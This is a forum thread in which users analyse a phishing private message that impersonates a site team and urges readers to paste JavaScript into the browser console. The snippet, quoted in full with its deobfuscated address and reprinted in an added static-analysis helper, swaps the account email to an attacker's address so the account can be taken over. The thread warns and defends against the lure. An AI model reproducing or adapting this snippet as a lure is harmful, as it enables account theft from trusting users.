/u/magnora7 - Is this for real? If this is some kind of attack it's next level. I got this private message today, copypasted in the entirety, and I've tried to replicate the formatting and copied the links (I also have a screenshot I'll add).
submitted 3 years ago * by JasonCarswell from (self.AskSaidIt)
[–]JasonCarswell[S] 3 insightful - 1 fun - 3 years ago* (12 children)
Why is it so anonymous? Why isn't it from /u/magnora7? When did /u/magnora7 suddenly decide to adopt a "SaidIt Team"? Sure he now has a few helpers but a "team"? That's a term I've been throwing around.
What does this do? (broken into 4 smaller chunks rather than one long line):
Paste this:
d=document;d.getElementsByName('email')[0]
.value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll
('x', '');d.getElementsByTagName('form')[1]
.submit();location.href="https://www.saidit.net/";
Hit enter. You've just kicked the hacker out of your account!
[–][deleted] 3 years ago (4 children)
[removed]
[–][deleted] 5 insightful - 2 fun - 3 years ago (3 children)
No, it just changes your email address, which allows the hacker to change your password. I don't think it actually works, though, after analyzing the code, because the attacker assumed the form uses POST, which it doesn't.
Regardless, I would never run that code if I was you, and if you did: make sure your email ain't been changed.
[–][deleted] 3 insightful - 1 fun - 3 years ago (2 children)
> because the attacker assumed the form uses POST, which it doesn't
It might be POST compatible. Once upon a time young lady, there was no javascript.
[–][deleted] 3 insightful - 1 fun - 3 years ago (0 children)
I tried it by substituting their email for one of my own, and it didn't work.
[–][deleted] 1 insightful - 1 fun - 3 years ago (0 children)
It's a dude bro. A dude who roleplays having a female penis.
[–][deleted] 6 insightful - 1 fun - 3 years ago (0 children)
It's JavaScript code. Do not run it!
'wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll('x', '') returns woridi5084@0pppp.com. That's the attacker's email address — looks like a scam address to me. They probably obfuscated it so they wouldn't get reported to their email provider, and so you wouldn't immediately recognize it as an email address.
d.getElementsByName('email')[0].value sets your email address to the email above, but doesn't actually change it.
d.getElementsByTagName('form')[1].submit() submits the form to change your email. I don't think that actually works, BTW, so if you did run the code: you're probably safe. (But still make sure your email hasn't been changed!) That page didn't use POST when I set my email address, so I think it just uses JavaScript.
location.href="https://www.saidit.net/"; Just redirects you to the home page.
Even if the code did work: this is a terrible way to hack into someone's account, since I don't know anyone who would actually paste a block of code into their console... you'd have to be a literal rock to fall for it.
But if y'all get something like this again: send me the code and I'll figure out what it does no matter how hard they try to obfuscate it.
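Added example, not part of the thread: a static triage helper that reads a pasted console snippet purely as text, resolves literal `.replaceAll()` de-obfuscation, and flags the set-email-then-submit pattern the comment above walks through. The function name `triageSnippet` and the indicator names are assumptions made for this example.

```javascript
// Static triage of a "paste this into your console" snippet.
// Nothing is evaluated; the snippet is only inspected as a string.
const Q = `(?:'([^']*)'|"([^"]*)")`; // a quoted literal without escapes
const REPLACE_CALL = new RegExp(
  `${Q}\\s*\\.\\s*replaceAll\\s*\\(\\s*${Q}\\s*,\\s*${Q}\\s*\\)`, 'g');

// Textual indicators for the behaviours described in the thread.
const INDICATORS = {
  setsEmailField: /getElementsByName\s*\(\s*['"]email['"]\s*\)[^;]*\.\s*value\s*=/,
  submitsForm: /\.\s*submit\s*\(\s*\)/,
  redirects: /location\s*\.\s*href\s*=/,
};

function triageSnippet(src) {
  // Resolve 'literal'.replaceAll('a', 'b') by hand instead of running it.
  const decoded = [];
  for (const m of src.matchAll(REPLACE_CALL)) {
    const [lit, from, to] = [m[1] ?? m[2], m[3] ?? m[4], m[5] ?? m[6]];
    if (from !== '') decoded.push(lit.split(from).join(to));
  }
  // A hidden e-mail address is the key finding for this kind of lure.
  const emails = decoded.filter((s) => /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(s));
  const hits = Object.fromEntries(
    Object.entries(INDICATORS).map(([name, re]) => [name, re.test(src)]));
  // Writing the e-mail field and then submitting a form is the takeover pattern.
  const accountTakeover = hits.setsEmailField && hits.submitsForm;
  return { decoded, emails, ...hits, accountTakeover };
}

// The snippet quoted in the thread, held as inert text (never passed to eval).
const SAMPLE = `d=document;d.getElementsByName('email')[0]
.value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll
('x', '');d.getElementsByTagName('form')[1]
.submit();location.href="https://www.saidit.net/";`;

console.log(triageSnippet(SAMPLE));
```

The helper only recognises plain quoted literals, so it is a first-pass filter for moderators or users, not a general deobfuscator.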
[–]LarrySwinger2 5 insightful - 1 fun - 3 years ago (5 children)
Please simply remove the code you pasted, in case anyone tries. I hope you haven't done what it says. If you have: please change your password ASAP.
[–]JasonCarswell[S] 3 insightful - 2 fun - 3 years ago (0 children)
Removed from the OP, but I left it, broken above for analysis.
[–][deleted] 3 insightful - 1 fun - 3 years ago* (3 children)
And make sure your email address hasn't been changed u/JasonCarswell.
[–]JasonCarswell[S] 2 insightful - 1 fun - 3 years ago (2 children)
I didn't plug it in. The whole thing seemed beyond fishy. My reason for immediately shouting it out was to warn people. Plus I wondered if it had come up before to others.
[–]send_nasty_stuff 3 insightful - 1 fun - 3 years ago (0 children)
I got a message as well. It must have gone out to most of saidit.
[–][deleted] 2 insightful - 1 fun - 3 years ago (0 children)
Great! I don't think anyone would actually fall for it, though (even if the code worked).